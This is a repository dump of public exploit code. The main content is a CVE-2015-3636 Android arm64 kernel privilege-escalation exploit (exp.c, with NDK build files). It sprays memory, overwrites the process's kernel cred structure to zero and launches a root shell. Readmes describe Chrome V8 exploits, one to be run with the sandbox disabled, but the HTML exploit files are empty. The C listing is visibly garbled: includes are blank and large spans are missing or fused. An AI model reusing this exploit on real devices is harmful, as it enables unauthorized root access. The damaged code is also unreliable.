├── Linux
└── CVE-2015-3636
│ ├── jni
│ ├── Application.mk
│ ├── Android.mk
│ └── exp.c
│ └── intro.md
├── Chrome
├── CVE-2015-6764
│ ├── readme.md
│ └── Exploit_V2.html
├── CVE-2016-1646
│ ├── readme.md
│ └── exploit.html
├── CVE-2015-1233
│ └── exploit.html
├── CVE-2014-3176
│ └── exploit.html
└── CVE-2014-1736
│ └── exploit.html
└── Safari
└── CVE-2016-4622
└── exploit.html
/Linux/CVE-2015-3636/jni/Application.mk:
--------------------------------------------------------------------------------
# Build only the 64-bit ARM (AArch64) variant; the rest of this tree is an
# arm64 kernel exploit and exp.c hard-codes kernel structure offsets, so a
# 32-bit build would be meaningless here.
APP_ABI := arm64-v8a

--------------------------------------------------------------------------------
/Linux/CVE-2015-3636/intro.md:
--------------------------------------------------------------------------------
1 | CVE-2015-3636 Android arm64 kernel exploit, written for the ["52pojie CTF 2016"](http://www.52pojie.cn/thread-480759-1-1.html). Build it with the Android NDK (`ndk-build` in this directory, using `jni/Android.mk` and `jni/Application.mk`); `Application.mk` pins `APP_ABI := arm64-v8a`, so only a 64-bit ARM executable named `exp` is produced. Note that `exp.c` hard-codes kernel structure offsets (e.g. for `task_struct->cred` and `task_struct->files`) that are specific to the target kernel build — they will not transfer to other devices or kernel versions without adjustment.
2 |
--------------------------------------------------------------------------------
/Linux/CVE-2015-3636/jni/Android.mk:
--------------------------------------------------------------------------------
# ndk-build module definition: compiles exp.c into a standalone native
# executable (BUILD_EXECUTABLE, not a shared library). The statement order
# matters: CLEAR_VARS must precede the LOCAL_* assignments and
# BUILD_EXECUTABLE must come last.
LOCAL_PATH := $(call my-dir)

include $(CLEAR_VARS)

# Name of the resulting binary.
LOCAL_MODULE:= exp

# Single translation unit; the whole exploit lives in exp.c.
LOCAL_SRC_FILES := exp.c

include $(BUILD_EXECUTABLE)

--------------------------------------------------------------------------------
/Chrome/CVE-2015-6764/readme.md:
--------------------------------------------------------------------------------
1 | [@oldfresher](https://twitter.com/oldfresher)'s exploit for his V8 bug [CVE-2015-6764](https://bugs.chromium.org/p/chromium/issues/detail?id=554946) is really awesome. I added some comments to his code and tried to use a Uint32Array instead of a DoubleArray to construct the fake ArrayBuffer object that is then abused for arbitrary memory read/write.
2 | You can get his exploit [here](https://github.com/secmob/cansecwest2016/blob/master/exploit.html).
--------------------------------------------------------------------------------
/Chrome/CVE-2016-1646/readme.md:
--------------------------------------------------------------------------------
1 | With the exploit tricks I learned from [oldfresher](http://twitter.com/oldfresher) I tried to complete a proof-of-concept exploit for [CVE-2016-1646](http://googlechromereleases.blogspot.com/2016/03/stable-channel-update_24.html); it has been tested on Windows 10 with Chrome 46.0.2490.0 installed. You can try it yourself with the following steps (this is a working exploit — run it only in an isolated VM or on a throwaway machine):
2 | + Step 1: start Chrome with `--no-sandbox` (the PoC carries no sandbox escape of its own, so it only works with the sandbox disabled)
3 | + Step 2: open exploit.html in that Chrome instance
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Safari/CVE-2016-4622/exploit.html:
--------------------------------------------------------------------------------
Proof of Concept Exploit for CVE-2016-4622
--------------------------------------------------------------------------------
/Chrome/CVE-2015-1233/exploit.html:
--------------------------------------------------------------------------------
3 | CVE-2015-1233
--------------------------------------------------------------------------------
/Chrome/CVE-2014-3176/exploit.html:
--------------------------------------------------------------------------------
3 | CVE-2014-3176
--------------------------------------------------------------------------------
/Chrome/CVE-2014-1736/exploit.html:
--------------------------------------------------------------------------------
3 | Proof of Concept Exploit for CVE-2014-1736
--------------------------------------------------------------------------------
/Linux/CVE-2015-3636/jni/exp.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 |
20 |
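/* Assumes a 4 KiB page kernel; arm64 kernels can also be built with 16/64 KiB
 * pages, so confirm this matches the target before relying on the spray sizes. */
#define PAGE_SIZE 4096
/* ioctl request number; its use is outside the visible part of this listing. */
#define SIOCGSTAMPNS 0x8907
/* Marker value; its use is outside the visible part of this listing. */
#define MAGIC_VALUE 0x4B5F5F4B
#define OOM_DISABLE (-100)
#define NSEC_PER_SEC 1000000000

#define STATUS_SUCCESS 0
/* Parenthesised: a bare `-1` breaks under unary minus (`-STATUS_FAILURE` -> `--1`). */
#define STATUS_FAILURE (-1)
/* Parenthesised: the bare `128*1024*1024` form mis-expands under `%`, `/` or a cast
 * (`2 % MAX_PHYSMAP_SIZE` would become `2 % 128 * 1024 * 1024`). Same value as before. */
#define MAX_PHYSMAP_SIZE (128 * 1024 * 1024)
#define MAX_PATH 0x100
/* Number of child processes that each spray MAX_PHYSMAP_SIZE bytes of pages. */
#define MAX_PHYSMAP_SPRAY_PROCESS 6
/* Number of sockets opened to trigger the bug; presumably why maximize_fd_limit()
 * raises RLIMIT_NOFILE first -- verify the raised limit is >= this on the target. */
#define MAX_VULTRIG_SOCKS_COUNT 4000
/* Size of the user mapping placed at address PAGE_SIZE (see the MAP_FIXED mmap below). */
#define MAX_NULLMAP_SIZE (PAGE_SIZE * 4)


/* Descriptors of the sockets used to trigger the vulnerability. */
int vultrig_socks[MAX_VULTRIG_SOCKS_COUNT];
/* User pages mapped for the physmap spray: one slot per page, for every spray process.
 * physmap_spray_pages_count presumably tracks how many slots are filled -- its writer
 * is outside the visible listing. */
void* physmap_spray_pages[(MAX_PHYSMAP_SIZE / PAGE_SIZE) * MAX_PHYSMAP_SPRAY_PROCESS];
int physmap_spray_pages_count;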
39 |
40 |
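/*
 * Raise this process's soft RLIMIT_NOFILE to its hard limit so the socket spray
 * can open enough descriptors.
 *
 * Returns the soft descriptor limit actually in effect afterwards, or -1 if it
 * could not be queried. A failed setrlimit() is tolerated on purpose: the limit
 * is re-read afterwards and whatever is really in effect is reported.
 */
static int
maximize_fd_limit(void)
{
    struct rlimit rlim;

    if (getrlimit(RLIMIT_NOFILE, &rlim) != 0) {
        return -1;
    }

    rlim.rlim_cur = rlim.rlim_max;
    (void)setrlimit(RLIMIT_NOFILE, &rlim);

    if (getrlimit(RLIMIT_NOFILE, &rlim) != 0) {
        return -1;
    }

    /*
     * rlim_t is wider than int. With an unlimited hard limit rlim_cur is
     * RLIM_INFINITY (all bits set), which the old `return rlim.rlim_cur;`
     * truncated to -1 -- indistinguishable from the failure path. Saturate
     * at the largest int instead (~0u >> 1 == INT_MAX, without <limits.h>).
     */
    const rlim_t int_max = (rlim_t)(~0u >> 1);
    if (rlim.rlim_cur > int_max) {
        return (int)int_max;
    }
    return (int)rlim.rlim_cur;
}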
62 |
63 |
64 |
65 | int spray_nofork(unsigned int size)
66 | {
67 |
68 | void* mapped;
69 | void* mapped_page;
70 | int ret, i;
71 |
72 | mapped = mmap(NULL, size , PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
73 | if(MAP_FAILED == mapped)
74 | {
75 | printf("[*] mmap fail.\n");
76 | exit(-1);
77 | }
78 |
79 |
80 | for(i=0; i /proc/sys/vm/mmap_min_addr");
317 | void* user_mm = mmap(PAGE_SIZE, MAX_NULLMAP_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE| MAP_FIXED |MAP_ANONYMOUS, -1, 0);
318 | if(MAP_FAILED == user_mm)
319 | {
320 | perror("[-] mmap NULL fail");
321 | exit(-1);
322 | }
323 |
324 | for(i=0; icred to gain root privilege
460 | */
461 | task = NULL;
462 | task = (void *)*(unsigned long *)((char *)user_mm + 0x18);
463 | printf("[*] task:%p\n", task);
464 |
465 | cred = NULL;
466 | kernel_read8((char *)task + 0x398, &cred);
467 | printf("[*] cred:%p\n", cred);
468 |
469 | data4 = 0;
470 | kernel_write4((char *)cred + 4, &data4);
471 | kernel_write4((char *)cred + 8, &data4);
472 | kernel_write4((char *)cred + 12, &data4);
473 | kernel_write4((char *)cred + 16, &data4);
474 | kernel_write4((char *)cred + 20, &data4);
475 | kernel_write4((char *)cred + 24, &data4);
476 | kernel_write4((char *)cred + 28, &data4);
477 | kernel_write4((char *)cred + 32, &data4);
478 |
479 | /*
480 | cleanup to avoid crash. overwirte task_struct->files->fdt->max_fds to 0
481 | */
482 |
483 | kernel_read8((char *)task + 0x788, &files);
484 | printf("[*] files:%p\n", files);
485 |
486 | kernel_read8((char *)files + 8, &fdt);
487 | printf("[*] fdt:%p\n", fdt);
488 |
489 | data4 = 0;
490 | kernel_write4(fdt, &data4);
491 |
492 |
493 | if(getuid() == 0)
494 | {
495 | printf("[*] congrats, enjoy your root shell.\n");
496 | system("/system/bin/sh");
497 | }
498 | else
499 | {
500 | printf("[*] Oops, you'd better have a cup of tea and try again:(\n");
501 | }
502 |
503 |
504 |
505 | return 0;
506 | }
507 |
508 |
--------------------------------------------------------------------------------
/Chrome/CVE-2015-6764/Exploit_V2.html:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Chrome/CVE-2016-1646/exploit.html:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------